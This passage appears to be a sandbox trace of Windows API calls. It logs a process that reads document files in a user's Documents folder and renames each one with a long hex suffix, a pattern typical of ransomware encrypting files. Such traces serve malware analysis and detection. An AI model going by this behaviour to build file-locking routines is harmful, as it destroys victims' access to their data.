ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.642] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf", lpString2=".493448B6A28B0A45E9A19E03AEACB0B36EB913CB5DA0C955784A2F1EDD8F9B7D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf.493448B6A28B0A45E9A19E03AEACB0B36EB913CB5DA0C955784A2F1EDD8F9B7D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf.493448B6A28B0A45E9A19E03AEACB0B36EB913CB5DA0C955784A2F1EDD8F9B7D" [0166.642] GetProcessHeap () returned 0x270000 [0166.642] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x148) returned 0x4257800 [0166.642] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x4257800, Length=0x148, FileInformationClass=0xa) returned 0x0 [0166.644] CloseHandle (hObject=0x598) returned 1 [0166.645] GetProcessHeap () returned 0x270000 [0166.647] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.647] RtlInterlockedCompareExchange64 () returned 0x1 [0166.647] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.651] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.652] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.654] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.655] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf", lpString2=".CB843A2299682EB75A6D8BB57EB1A517AEFE195DA8FCC4F14561694115C56B50" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf.CB843A2299682EB75A6D8BB57EB1A517AEFE195DA8FCC4F14561694115C56B50") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf.CB843A2299682EB75A6D8BB57EB1A517AEFE195DA8FCC4F14561694115C56B50" [0166.655] GetProcessHeap () returned 0x270000 [0166.655] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x76b83f0 [0166.656] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b83f0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0166.657] CloseHandle (hObject=0x598) returned 1 [0166.658] GetProcessHeap () returned 0x270000 [0166.660] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.660] RtlInterlockedCompareExchange64 () returned 0x1 [0166.660] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.664] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.667] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.669] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.670] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps", lpString2=".014EF268F10038221DBC25D89D66C66C307FD40CBCCA8D150D254B8C37274F72" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps.014EF268F10038221DBC25D89D66C66C307FD40CBCCA8D150D254B8C37274F72") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps.014EF268F10038221DBC25D89D66C66C307FD40CBCCA8D150D254B8C37274F72" [0166.670] GetProcessHeap () returned 0x270000 [0166.670] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x76b8548 [0166.670] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8548, Length=0x140, FileInformationClass=0xa) returned 0x0 [0166.673] CloseHandle (hObject=0x598) returned 1 [0166.673] GetProcessHeap () returned 0x270000 [0166.675] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.675] RtlInterlockedCompareExchange64 () returned 0x1 [0166.676] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.679] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x5600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.679] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.681] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.682] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp", lpString2=".81C1BFD2A163A2FCB88AB689B2761894E84597237411EF512145F3AE23223344" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp.81C1BFD2A163A2FCB88AB689B2761894E84597237411EF512145F3AE23223344") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp.81C1BFD2A163A2FCB88AB689B2761894E84597237411EF512145F3AE23223344" [0166.682] GetProcessHeap () returned 0x270000 [0166.682] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35b740 [0166.682] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x35b740, Length=0x152, FileInformationClass=0xa) returned 0x0 [0166.684] CloseHandle (hObject=0x598) returned 1 [0166.685] GetProcessHeap () returned 0x270000 [0166.688] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.688] RtlInterlockedCompareExchange64 () returned 0x1 [0166.688] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.700] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.700] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.703] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.704] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx", lpString2=".2A5496E20D96D4D021BF330AD735FFA146C21A6D0212E0BFAB268CEA8D88890E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx.2A5496E20D96D4D021BF330AD735FFA146C21A6D0212E0BFAB268CEA8D88890E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx.2A5496E20D96D4D021BF330AD735FFA146C21A6D0212E0BFAB268CEA8D88890E" [0166.704] GetProcessHeap () returned 0x270000 [0166.704] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x4257958 [0166.705] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x4257958, Length=0x146, FileInformationClass=0xa) returned 0x0 [0166.707] CloseHandle (hObject=0x598) returned 1 [0166.708] GetProcessHeap () returned 0x270000 [0166.709] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.709] RtlInterlockedCompareExchange64 () returned 0x1 [0166.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.714] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.714] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.717] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.719] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls", lpString2=".16E656A9826E14763C82A07AFE54A9408EE01888706B8E48784AD3163B583266" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls.16E656A9826E14763C82A07AFE54A9408EE01888706B8E48784AD3163B583266") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls.16E656A9826E14763C82A07AFE54A9408EE01888706B8E48784AD3163B583266" [0166.719] GetProcessHeap () returned 0x270000 [0166.719] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x76b8998 [0166.719] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8998, Length=0x150, FileInformationClass=0xa) returned 0x0 [0166.720] CloseHandle (hObject=0x598) returned 1 [0166.722] GetProcessHeap () returned 0x270000 [0166.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.723] RtlInterlockedCompareExchange64 () returned 0x1 [0166.723] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.728] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.732] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.734] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.735] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf", lpString2=".7A360C43AEDD756D2D2D3ACE343BE926B99E68A966CE31FF78F2346DD5A72573" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf.7A360C43AEDD756D2D2D3ACE343BE926B99E68A966CE31FF78F2346DD5A72573") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf.7A360C43AEDD756D2D2D3ACE343BE926B99E68A966CE31FF78F2346DD5A72573" [0166.735] GetProcessHeap () returned 0x270000 [0166.735] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x4257ab0 [0166.735] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x4257ab0, Length=0x146, FileInformationClass=0xa) returned 0x0 [0166.738] CloseHandle (hObject=0x598) returned 1 [0166.738] GetProcessHeap () returned 0x270000 [0166.740] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.740] RtlInterlockedCompareExchange64 () returned 0x1 [0166.740] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.746] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.746] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.748] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.750] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps", lpString2=".D3A7189E2C47A0C8A410554DA9F0431AB4A66827FD6584A84AEF070492039041" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps.D3A7189E2C47A0C8A410554DA9F0431AB4A66827FD6584A84AEF070492039041") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps.D3A7189E2C47A0C8A410554DA9F0431AB4A66827FD6584A84AEF070492039041" [0166.750] GetProcessHeap () returned 0x270000 [0166.750] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35b8a8 [0166.750] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x35b8a8, Length=0x152, FileInformationClass=0xa) returned 0x0 [0166.751] CloseHandle (hObject=0x598) returned 1 [0166.752] GetProcessHeap () returned 0x270000 [0166.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.755] RtlInterlockedCompareExchange64 () returned 0x1 [0166.755] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.758] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.758] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.760] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.761] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods", lpString2=".25D772F9A59E93F213C4F9FE184F28BA69D12A7B71611BF8228380DEC517C455" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods.25D772F9A59E93F213C4F9FE184F28BA69D12A7B71611BF8228380DEC517C455") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods.25D772F9A59E93F213C4F9FE184F28BA69D12A7B71611BF8228380DEC517C455" [0166.761] GetProcessHeap () returned 0x270000 [0166.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14c) returned 0x76b8af0 [0166.761] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8af0, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0166.763] CloseHandle (hObject=0x598) returned 1 [0166.763] GetProcessHeap () returned 0x270000 [0166.765] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.765] RtlInterlockedCompareExchange64 () returned 0x1 [0166.765] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.769] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.769] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.771] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.772] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf", lpString2=".3A9A516757A477E8493C1AF8F352BF2AF300B23989AD6326B1F387D71EC8D74B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf.3A9A516757A477E8493C1AF8F352BF2AF300B23989AD6326B1F387D71EC8D74B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf.3A9A516757A477E8493C1AF8F352BF2AF300B23989AD6326B1F387D71EC8D74B" [0166.772] GetProcessHeap () returned 0x270000 [0166.772] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15c) returned 0x76b8c48 [0166.772] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8c48, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0166.775] CloseHandle (hObject=0x598) returned 1 [0166.775] GetProcessHeap () returned 0x270000 [0166.777] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.778] RtlInterlockedCompareExchange64 () returned 0x1 [0166.778] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.785] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.786] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.789] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.790] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx", lpString2=".1DAB52EB8DF9543FC1A26C294E08DA5E39B1D9F2E67D45B7921C1ED6AAC58038" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx.1DAB52EB8DF9543FC1A26C294E08DA5E39B1D9F2E67D45B7921C1ED6AAC58038") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx.1DAB52EB8DF9543FC1A26C294E08DA5E39B1D9F2E67D45B7921C1ED6AAC58038" [0166.790] GetProcessHeap () returned 0x270000 [0166.790] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x76b8db0 [0166.790] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8db0, Length=0x140, FileInformationClass=0xa) returned 0x0 [0166.792] CloseHandle (hObject=0x5b0) returned 1 [0166.793] GetProcessHeap () returned 0x270000 [0166.795] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.795] RtlInterlockedCompareExchange64 () returned 0x1 [0166.795] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.800] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.802] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.805] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.806] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf", lpString2=".E22AC00E85F69DE7717CD46D0A9E913768C81024084E9F443C9BC7040C52A24A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf.E22AC00E85F69DE7717CD46D0A9E913768C81024084E9F443C9BC7040C52A24A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf.E22AC00E85F69DE7717CD46D0A9E913768C81024084E9F443C9BC7040C52A24A" [0166.806] GetProcessHeap () returned 0x270000 [0166.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741d418 [0166.806] NtSetInformationFile 